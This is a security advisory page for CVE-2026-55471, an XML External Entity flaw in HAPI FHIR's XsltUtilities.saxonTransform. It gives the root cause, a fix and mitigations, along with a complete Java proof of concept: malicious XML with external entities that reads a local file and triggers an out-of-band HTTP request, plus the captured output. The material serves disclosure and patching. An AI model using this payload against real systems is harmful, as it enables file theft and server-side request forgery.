Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
☕ Maven
Not in CISA KEV

CVE-2026-55471 — org.hl7.fhir.utilities

Fix: hapifhir/org.hl7.fhir.core@01ca2ec

CVE-2026-55471 is a XML External Entity (XXE) vulnerability in ca.uhn.hapi.fhir:org.hl7.fhir.utilities. A fix is available for ca.uhn.hapi.fhir:org.hl7.fhir.utilities — see the affected versions and patch details below.

HAPI FHIR: XXE in XsltUtilities.saxonTransform via unhardened Saxon TransformerFactory

Also known asGHSA-2f55-g35j-5jmf
Published
Updated
Affected
1 pkg
Patched
1 / 1
Exploits
None indexed
Exploitation data as of Oct 5, 2026 · OSV.dev, NVD, FIRST.org (EPSS)

Exploitation Status

Proof-of-concept exploit code exists

  • CISA’s SSVC triage found public proof-of-concept exploit code for this CVE, though no confirmed active exploitation.
  • CISA assesses this as automatable — exploitation doesn’t require manual, per-target effort, which raises the odds of mass scanning and opportunistic attacks.

Exploitation and automatability from CISA’s SSVC triage for CVE-2026-55471.

EPSS Exploitation Probability

via FIRST.org ↗
0.6%probability of exploitation in next 30 days
Lower Risk0.00%
Lower risk than most CVEs45th percentile — riskier than 45% of all scored CVEsHighest risk
0.00%0.36%0.71%1.07%0.4%0.6%0.6%0.6%Aug 26Oct 26Oct 26

Probability of exploitation in the next 30 days, from FIRST.org EPSS.

Real-World Exposure

1 pkg affected
☕ca.uhn.hapi.fhir:org.hl7.fhir.utilities

Real-time download stats are indexed for npm and PyPI packages. This vulnerability affects Maven packages — download data is not available via public APIs for these ecosystems.

Description

Summary

org.hl7.fhir.utilities.XsltUtilities exposes two parallel families of XSLT transform helpers. The transform(...) overloads obtain their TransformerFactory from the project's hardened helper XMLUtil.newXXEProtectedTransformerFactory() (which sets ACCESS_EXTERNAL_DTD="" and ACCESS_EXTERNAL_STYLESHEET=""). The sibling saxonTransform(...) overloads instead instantiate a bare new net.sf.saxon.TransformerFactoryImpl() with no external-access restriction. A document transformed through any saxonTransform(...) overload is parsed with external general entities and external DTD/parameter entities enabled, so an attacker who controls (or can MITM) the transformed XML obtains XML External Entity injection: local file disclosure and blind XXE / SSRF to arbitrary URLs reachable from the host.

XMLUtil documents that its protected factory "should be the only place where TransformerFactory is instantiated in this project". The saxonTransform overloads violate that contract while their same-file transform siblings honour it.

Affected versions

org.hl7.fhir.utilities (Maven ca.uhn.hapi.fhir:org.hl7.fhir.utilities) <= 6.9.8 (latest release at time of report; verified live on 6.9.8). The bare net.sf.saxon.TransformerFactoryImpl() instantiation is present at XsltUtilities.java:61, :91, and :106.

Privilege required

None at the library boundary. The exposure depends on the calling tool: any FHIR component that runs XsltUtilities.saxonTransform(...) over XML whose source document, embedded DTD, or referenced stylesheet is attacker-influenced (an IG package, a fetched/uploaded resource, a downloaded stylesheet, or a MITM'd HTTP fetch) triggers the XXE. No DOCTYPE/entity stripping occurs before the Saxon parser sees the bytes.

Root cause

org.hl7.fhir.utilities/src/main/java/org/hl7/fhir/utilities/XsltUtilities.java:

// VULNERABLE — bare factory, no external-access restriction (lines 60-73, 90-99, 105-128)
public static byte[] saxonTransform(Map<String, byte[]> files, byte[] source, byte[] xslt) throws TransformerException {
    TransformerFactory f = new net.sf.saxon.TransformerFactoryImpl();   // <-- bare
    f.setAttribute("http://saxon.sf.net/feature/version-warning", Boolean.FALSE);
    StreamSource xsrc = new StreamSource(new ByteArrayInputStream(xslt));
    f.setURIResolver(new ZipURIResolver(files));
    Transformer t = f.newTransformer(xsrc);
    ...
}
public static String saxonTransform(String source, String xslt) throws TransformerException, IOException {
    TransformerFactoryImpl f = new net.sf.saxon.TransformerFactoryImpl();   // <-- bare
    ...
}

// HARDENED SIBLING (same file, lines 75-88 / 130-149) — negative control
public static byte[] transform(Map<String, byte[]> files, byte[] source, byte[] xslt) throws TransformerException {
    TransformerFactory f = org.hl7.fhir.utilities.xml.XMLUtil.newXXEProtectedTransformerFactory(); // <-- hardened
    ...
}

The hardened helper (XMLUtil.newXXEProtectedTransformerFactory()) is:

public static TransformerFactory newXXEProtectedTransformerFactory() {
    final TransformerFactory transformerFactory = TransformerFactory.newInstance();
    transformerFactory.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
    transformerFactory.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");
    return transformerFactory;
}

The saxonTransform overloads never call this helper and never set the two ACCESS_EXTERNAL_* attributes, so the underlying parser resolves external general entities (<!ENTITY x SYSTEM "file:///...">) and external DTD/parameter entities (<!ENTITY % p SYSTEM "http://attacker/">). This is a classic CWE-611. The asymmetry — one family hardened, the co-located sibling family bare — is the bug: the protection that already exists in the same class was not extended to the saxonTransform variants.

Reproduction (E2E against published Maven Central org.hl7.fhir.utilities:6.9.8)

A self-contained Maven project. pom.xml pulls the latest released artifact, which transitively brings net.sf.saxon:Saxon-HE:11.6.

pom.xml:

<project xmlns="http://maven.apache.org/POM/4.0.0">
  <modelVersion>4.0.0</modelVersion>
  <groupId>poc</groupId><artifactId>fhir-xslt-xxe-poc</artifactId><version>1.0</version>
  <properties>
    <maven.compiler.source>17</maven.compiler.source>
    <maven.compiler.target>17</maven.compiler.target>
  </properties>
  <dependencies>
    <dependency>
      <groupId>ca.uhn.hapi.fhir</groupId>
      <artifactId>org.hl7.fhir.utilities</artifactId>
      <version>6.9.8</version>
    </dependency>
  </dependencies>
</project>

src/main/java/Poc.java:

import org.hl7.fhir.utilities.XsltUtilities;
import java.io.*;
import java.net.*;
import java.nio.charset.StandardCharsets;
import java.nio.file.*;
import java.util.*;

public class Poc {
  static final String CANARY_MARK = "TOP-SECRET-FHIR-XSLT-CANARY-3f9a17c2";
  // identity stylesheet: copies the resolved //data text into the output
  static final String IDENTITY_XSLT =
      "<?xml version=\"1.0\"?>\n" +
      "<xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\">\n" +
      "  <xsl:output method=\"text\"/>\n" +
      "  <xsl:template match=\"/\"><xsl:value-of select=\"//data\"/></xsl:template>\n" +
      "</xsl:stylesheet>\n";

  public static void main(String[] args) throws Exception {
    Path secret = Files.createTempFile("fhir-secret-", ".txt");
    Files.writeString(secret, CANARY_MARK + " :: " + UUID.randomUUID());

    final List<String> oobHits = Collections.synchronizedList(new ArrayList<>());
    ServerSocket sentinel = new ServerSocket(0);
    int oobPort = sentinel.getLocalPort();
    Thread st = new Thread(() -> {
      try {
        while (!sentinel.isClosed()) {
          Socket s = sentinel.accept();
          BufferedReader r = new BufferedReader(new InputStreamReader(s.getInputStream(), StandardCharsets.UTF_8));
          String line = r.readLine();
          if (line != null) { oobHits.add(line); System.out.println("[SENTINEL] inbound connection: " + line); }
          byte[] body = "<!-- ok -->".getBytes(StandardCharsets.UTF_8); // well-formed empty external DTD
          OutputStream os = s.getOutputStream();
          os.write(("HTTP/1.1 200 OK\r\nContent-Type: application/xml-dtd\r\nContent-Length: " + body.length + "\r\n\r\n").getBytes());
          os.write(body); os.flush(); s.close();
        }
      } catch (IOException ignored) {}
    });
    st.setDaemon(true); st.start();

    // A1: external general entity -> local secret (file read)
    // A2: external parameter entity -> attacker URL (blind XXE / SSRF)
    String maliciousSource =
        "<?xml version=\"1.0\"?>\n" +
        "<!DOCTYPE root [\n" +
        "  <!ENTITY canary SYSTEM \"" + secret.toUri() + "\">\n" +
        "  <!ENTITY % oob SYSTEM \"http://127.0.0.1:" + oobPort + "/evil-fhir-xslt-ssrf.dtd\">\n" +
        "  %oob;\n" +
        "]>\n" +
        "<root><data>&canary;</data></root>\n";
    Path srcFile = Files.createTempFile("fhir-malicious-src-", ".xml");
    Files.writeString(srcFile, maliciousSource);
    Path xsltFile = Files.createTempFile("fhir-identity-", ".xslt");
    Files.writeString(xsltFile, IDENTITY_XSLT);

    System.out.println("=== Target: org.hl7.fhir.utilities:6.9.8 (XsltUtilities) on JDK " + System.getProperty("java.version") + " ===");
    System.out.println("=== Saxon: " + saxonVersion() + " ===");
    System.out.println("Secret file: " + secret + " (contains " + CANARY_MARK + ")");
    System.out.println("OOB sentinel: http://127.0.0.1:" + oobPort + "/\n");

    System.out.println("---- ATTACK: XsltUtilities.saxonTransform(source, xslt)  [BARE TransformerFactoryImpl] ----");
    try {
      String out = XsltUtilities.saxonTransform(srcFile.toString(), xsltFile.toString());
      System.out.println("transform output: [" + out.trim() + "]");
      System.out.println(out.contains(CANARY_MARK)
        ? ">>> XXE CONFIRMED: canary leaked into XSLT output via external entity <<<"
        : ">>> canary NOT in output <<<");
    } catch (Exception e) { System.out.println("saxonTransform threw: " + e); }
    Thread.sleep(400);
    System.out.println("OOB sentinel hits after BARE call: " + oobHits + "\n");

    // Direct factory comparison (isolates the hardening difference)
    System.out.println("---- DIRECT FACTORY COMPARISON (same malicious source, identity XSLT) ----");
    int b = oobHits.size();
    System.out.println("[bare new TransformerFactoryImpl()]");
    runDirect(new net.sf.saxon.TransformerFactoryImpl(), srcFile, xsltFile, oobHits, b);
    int b2 = oobHits.size();
    System.out.println("[hardened XMLUtil.newXXEProtectedTransformerFactory()]");
    runDirect(org.hl7.fhir.utilities.xml.XMLUtil.newXXEProtectedTransformerFactory(), srcFile, xsltFile, oobHits, b2);
    sentinel.close();
  }

  static void runDirect(javax.xml.transform.TransformerFactory f, Path srcFile, Path xsltFile, List<String> oobHits, int before) throws Exception {
    try {
      javax.xml.transform.Transformer t = f.newTransformer(new javax.xml.transform.stream.StreamSource(Files.newInputStream(xsltFile)));
      ByteArrayOutputStream out = new ByteArrayOutputStream();
      t.transform(new javax.xml.transform.stream.StreamSource(Files.newInputStream(srcFile)), new javax.xml.transform.stream.StreamResult(out));
      String s = out.toString(StandardCharsets.UTF_8).trim();
      System.out.println("  output: [" + s + "]");
      System.out.println("  canary leaked: " + s.contains(CANARY_MARK));
    } catch (Exception e) {
      System.out.println("  threw: " + e.getClass().getName() + ": " + String.valueOf(e.getMessage()).replaceAll("[\\u4e00-\\u9fff]", "?"));
    }
    Thread.sleep(300);
    System.out.println("  OOB sentinel hits from this call: " + (oobHits.size() - before));
  }

  static String saxonVersion() {
    try { return (String) Class.forName("net.sf.saxon.Version").getMethod("getProductVersion").invoke(null); }
    catch (Throwable t) { return "unknown"; }
  }
}

Run + verbatim captured output (JDK 17.0.18, Saxon-HE 11.6; CJK in the hardened-path SAXParseException replaced with ? by the harness for ASCII display, the message text is accessExternalDTD ... restriction ... 'http' access not allowed):

$ mvn -q compile && mvn -q exec:java -Dexec.mainClass=Poc
=== Target: org.hl7.fhir.utilities:6.9.8 (XsltUtilities) on JDK 17.0.18 ===
=== Saxon: 11.6 ===
Secret file: /var/folders/.../fhir-secret-467000002121832365.txt (contains TOP-SECRET-FHIR-XSLT-CANARY-3f9a17c2)
OOB sentinel: http://127.0.0.1:62466/

---- ATTACK: XsltUtilities.saxonTransform(source, xslt)  [BARE TransformerFactoryImpl] ----
[SENTINEL] inbound connection: GET /evil-fhir-xslt-ssrf.dtd HTTP/1.1
transform output: [TOP-SECRET-FHIR-XSLT-CANARY-3f9a17c2 :: 4e3c33aa-4db1-4f22-880f-6666fedd9da4]
>>> XXE CONFIRMED: canary leaked into XSLT output via external entity <<<
OOB sentinel hits after BARE call: [GET /evil-fhir-xslt-ssrf.dtd HTTP/1.1]

---- DIRECT FACTORY COMPARISON (same malicious source, identity XSLT) ----
[bare new TransformerFactoryImpl()]
[SENTINEL] inbound connection: GET /evil-fhir-xslt-ssrf.dtd HTTP/1.1
  output: [TOP-SECRET-FHIR-XSLT-CANARY-3f9a17c2 :: 4e3c33aa-4db1-4f22-880f-6666fedd9da4]
  canary leaked: true
  OOB sentinel hits from this call: 1
[hardened XMLUtil.newXXEProtectedTransformerFactory()]
  threw: net.sf.saxon.trans.XPathException: org.xml.sax.SAXParseException; lineNumber: 5; columnNumber: 8; ????: ???????? 'evil-fhir-xslt-ssrf.dtd', ?? accessExternalDTD ???????????? 'http' ??.
  OOB sentinel hits from this call: 0

Interpretation of the verbatim output:

  • Bare path (saxonTransform and bare TransformerFactoryImpl): the local secret file content (TOP-SECRET-FHIR-XSLT-CANARY-3f9a17c2 :: ...) is leaked into the transform output (file disclosure), and the OOB sentinel receives GET /evil-fhir-xslt-ssrf.dtd HTTP/1.1 (blind XXE / SSRF). canary leaked: true, OOB hits = 1.
  • Hardened path (XMLUtil.newXXEProtectedTransformerFactory()): parsing the same malicious source throws an accessExternalDTD ... 'http' access not allowed SAXParseException and the OOB sentinel receives 0 hits. The only difference between the two runs is the factory: the existing project helper blocks the attack, the bare sibling does not.

Impact

  • Local file disclosure: any file readable by the JVM process is exfiltrated into the transform output (demonstrated above with a canary secret file).
  • Blind XXE / SSRF: external parameter/DTD entities cause the host to issue attacker-directed HTTP(S) requests (demonstrated by the sentinel hit), enabling internal-network probing and cloud metadata access from the host's network position.
  • The saxonTransform overloads are part of the public org.hl7.fhir.utilities API consumed across the FHIR Java tooling (IG-publisher / validation / conversion utilities); any consumer that routes attacker-influenced or MITM-able XML through them inherits the XXE.

Suggested fix

Route the saxonTransform overloads through the same protection the transform siblings already use. Because these overloads specifically need the Saxon implementation, obtain a Saxon factory and apply the two ACCESS_EXTERNAL_* restrictions (mirroring XMLUtil.newXXEProtectedTransformerFactory()), e.g. a small helper in XMLUtil:

@SuppressWarnings("checkstyle:transformerFactoryNewInstance")
public static TransformerFactory newXXEProtectedSaxonTransformerFactory() {
    final TransformerFactory f = new net.sf.saxon.TransformerFactoryImpl();
    f.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
    f.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");
    return f;
}

and replace each new net.sf.saxon.TransformerFactoryImpl() in XsltUtilities.saxonTransform(...) (lines 61, 91, 106) with a call to it. This mirrors the existing newXXEProtected* convention and the class-level mandate that the protected factory "should be the only place where TransformerFactory is instantiated in this project". A regression test that runs a DOCTYPE-bearing source through saxonTransform and asserts the external entity is NOT resolved should accompany the change.

Credit

Reported by tonghuaroot.

Affected Packages

1 total 1 fixed
EcosystemPackageVulnerable rangeFix
☕Mavenca.uhn.hapi.fhir:org.hl7.fhir.utilitiesall versions6.9.10ca.uhn.hapi.fhir:org.hl7.fhir.utilities:6.9.10

Affected Products

1 product · 1 configurations
Application
hl7 fhir corehapifhir
< 6.9.10
range

Detection & mitigation playbook

Open-source dependency
  1. Detect

    Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for ca.uhn.hapi.fhir:org.hl7.fhir.utilities, including transitive dependencies — a direct dependency you never call can still pull in a vulnerable version.

  2. Fix

    Update ca.uhn.hapi.fhir:org.hl7.fhir.utilities to 6.9.10 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms CVE-2026-55471 is resolved across your whole dependency graph.

  3. Workarounds

    Restrict outbound requests from the affected component to an allowlist of hosts, block access to link-local and internal address ranges at the network layer, and require authentication on internal services so a forged request cannot reach them unauthenticated.

Fixing This On Your OS

If you run this on a Linux distribution, patch through your package manager against the distro's own security advisory below — it tracks the exact backported fix for your release, which can ship on a different timeline (and sometimes a different severity) than the upstream project.

Red HatImportant

This is an Important flaw in HAPI FHIR `XsltUtilities` that allows XML External Entity (XXE) injection. An unauthenticated, remote attacker can exploit this by providing specially crafted XML data to disclose local files or perform Server-Side Request Forgery (SSRF). This is critical in environments where Red Hat…

Workaround published by Red Hat
Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.
Source: Red Hat security advisory for CVE-2026-55471 (CC BY 4.0)
ProductFixed inAdvisory
Red Hat Build of Apache Camel 4.18 for Quarkus 3.33org.hl7.fhir.utilitiesRHSA-2026:54776

Frequently Asked Questions

### Summary `org.hl7.fhir.utilities.XsltUtilities` exposes two parallel families of XSLT transform helpers. The `transform(...)` overloads obtain their `TransformerFactory` from the project's hardened helper `XMLUtil.newXXEProtectedTransformerFactory()` (which sets `ACCESS_EXTERNAL_DTD=""` and `ACCESS_EXTERNAL_STYLESHEET=""`). The sibling `saxonTransform(...)` overloads instead instantiate a **bare** `new net.sf.saxon.TransformerFactoryImpl()` with no external-access restriction. A document transformed through any `saxonTransform(...)` overload is parsed with external general entities and ext
O3 Security · Impact-Aware SCA

Is CVE-2026-55471 in your dependencies?

Find it across Maven, including transitive dependencies.

CVE-2026-55471: org.hl7.fhir.utilities SSRF — Fixed in 6.9.10